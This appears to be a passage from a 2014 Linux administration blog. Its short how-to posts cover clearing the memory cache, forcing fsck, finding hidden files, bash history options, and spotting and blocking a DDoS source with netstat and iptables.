id:5:initdefault:

Reboot the system to see changes:

reboot

Ref:
http://www.cyberciti.biz/tips/linux-changing-run-levels.html
http://www.ibm.com/developerworks/library/l-lpic1-v3-101-3/

Monday, 19 May 2014

Clear Memory Cache on Linux Server

Flush file system buffers by executing,

# sync

Kernels 2.6.16.x and newer versions of kernel provide a mechanism to have the kernel drop the page cache and/or inode and dentry caches on command, which can be helpful to free up a lot of memory.

To free page cache:

# echo 1 > /proc/sys/vm/drop_caches

To free dentries and inodes:

# echo 2 > /proc/sys/vm/drop_caches

To free page cache, dentries and inodes:

echo 3 > /proc/sys/vm/drop_caches

or

sync; echo 3 > /proc/sys/vm/drop_caches

Sync should be run because this is a non-destructive operation, and dirty objects are not freeable.
So you run sync in order to make sure all cached objects are freed.

To do clearing memory cache on a particular interval, just add the command to cron job

vi cacheclear.sh

#!/bin/sh
sudo sh -c "sync; echo 3 > /proc/sys/vm/drop_caches"

Ref: http://www.unixmen.com/how-to-clear-memory-cache-on-linux-servers/

Sunday, 18 May 2014

Force fsck in Linux

fsck stands for "file system check" and it is used to check and optionally repair one or more Linux file systems. Normally, the fsck program will try to handle filesystems on different physical disk drives in parallel to reduce the total amount of time needed to check all of the filesystems

Login as the root:
su root

Change directory to root (/) directory:
cd /

Create a file called forcefsck:
touch /forcefsck

Now reboot the system:
reboot

login as root and type the following command to reboot and run fsck:

shutdown -rF now

The -F option force fsck on reboot.

Ref:
http://www.cyberciti.biz/faq/linux-force-fsck-on-the-next-reboot-or-boot-sequence/
https://wiki.archlinux.org/index.php/fsck

Thursday, 15 May 2014

Recursively list all hidden files and directories

The basic syntax is as follows:

find /dir/to/search/ -name ".*" -print

find /dir/to/search/ -name ".*" -ls

search only hidden files:

find /dir/to/search/ -type f -iname ".*" -ls

search only hidden directories:

find /dir/to/search/ -type d -iname ".*" -ls
find /dir/to/search -path '*/.*' -print
find /dir/to/search -path '*/.*' -ls

In this example, search $HOME for all hidden files and dirs:

find $HOME -name ".*" -ls

135237 4 -rw-r--r-- 1 root root 18 May 20 2009 /root/.bash_logout
137605 4 -rw------- 1 root root 32 May 15 01:08 /root/.mysql_history
135240 4 -rw-r--r-- 1 root root 100 Sep 22 2004 /root/.cshrc
131153 4 drwxr----- 3 root root 4096 Feb 27 19:28 /root/.pki
136444 4 -rw-r--r-- 1 root root 686 Feb 27 07:22 /root/.bash_profile
137510 4 drwx------ 2 root root 4096 May 8 02:00 /root/.ssh
135241 4 -rw-r--r-- 1 root root 129 Dec 3 2004 /root/.tcshrc
136494 4 -rw-r--r-- 1 root root 310 Feb 27 07:22 /root/.bashrc
137490 16 -rw------- 1 root root 14970 May 15 01:02 /root/.bash_history

Ref: http://www.cyberciti.biz/faq/unix-linux-centos-ubuntu-find-hidden-files-recursively/

Recursively list all files and directories

ls -alR

find . -exec ls -dl \{\} \; | awk '{print $3, $4, $9}'

find . -printf "%u %g %p\n"

tree -p -u -g -f -i

tree -p -u -g -f

find $PWD -type f

find . -ls

List only .html files

find . -name "*.html"

Ref: http://stackoverflow.com/questions/501367/how-to-recursively-list-all-files-and-directories

Wednesday, 14 May 2014

History Command in Linux

List All Executed Commands in Linux

history

List All Commands with Date and Timestamp

export HISTTIMEFORMAT='%F %T '
history
%F Equivalent to %Y - %m - %d
%T Replaced by the time ( %H : %M : %S )

Filter Commands in History

export HISTIGNORE='ls -l:pwd:date:'
history

Ignore Duplicate Commands in History

export HISTCONTROL=ignoredups
history

Unset export Command

unset export HISTCONTROL
history

Save export Command Permanently

vi .bash_profile
PATH=$PATH:$HOME/bin
export PATH

Disable Storing History of Commands

vi .bash_profile
PATH=$PATH:$HOME/bin
HISTSIZE=0
export PATH
.bash_profile (END)

source .bash_profile

Delete or Clear History of Commands

history -c

Search Commands in History Using Grep Command

history | grep pwd

Recall Lastly Executed Command

Bang and 8 (!8)

Recall Lastly Executed Specific Command

!net

List last 25 commands

history 25

Ref:

http://www.tecmint.com/history-command-examples/
https://www.digitalocean.com/community/articles/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps

DoS and DDoS attack

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is a attack in which the server resources become unavailable to its intended users.

A DOS attack is an attempt to make a system or server unavailable for legitimate users and, finally, to take the service down. This is achieved by flooding the server’s request queue with fake requests. After this, server will not be able to handle the requests of legitimate users.

In general, there are two forms of the DOS attack. The first form is on that can crash a server. The second form of DOS attack only floods a service.

In simple words DDOS attack is, when a server system is being flooded from fake requests coming from multiple sources (potentially hundreds of thousands), it is known as a DDOS attack. In this case, blocking a single or few IP address does not work. The more members in the zombie network, more powerful the attack it. For creating the zombie network, hackers generally use a Trojan.

There are basically three types of DDOS attacks:

Application layer DDOS attack: Application-layer DDOS attacks are attacks that target Windows, Apache, OpenBSD, or other software vulnerabilities to perform the attack and crash the server.

Protocol DDOS attack: A protocol DDOS attacks is a DOS attack on the protocol level. This category includes Synflood, Ping of Death, and more.

Volume-based DDOS attack: This type of attack includes ICMP floods, UDP floods, and other kind of floods performed via spoofed packets.

How to troubleshoot,

list of IP’s with maximum number of connections to server,

netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

remember that ddos becomes more complex as attackers are using fewer connections with more number of attacking IP’s,

the number of active connections open to server,

netstat -n | grep :80 |wc -l

netstat -n | grep :80 | grep SYN |wc -l

Ex:
cd /edu-log/edurite/
cat 20140505.access.log | awk '{print $1}' |sort |uniq -c |sort -nr |more

------------
110.85.112.16
27.153.209.89
120.33.245.187
27.150.229.164
121.205.197.8
121.205.196.173
27.153.186.129
------------

Trace the IP using the follwoing URL,

http://tools.whois.net/whoisbyip/

One example for how to block a particular IP on the server,

iptables -A INPUT -s 27.153.186.129 -j DROP

/etc/init.d/iptables save
/etc/init.d/firewall restart

Ref:

http://webhosting.uk.com/kb/how-to-check-if-your-linux-server-is-under-ddos-attack/
http://resources.infosecinstitute.com/dos-attacks-free-dos-attacking-tools/

Popular Posts

Search This Blog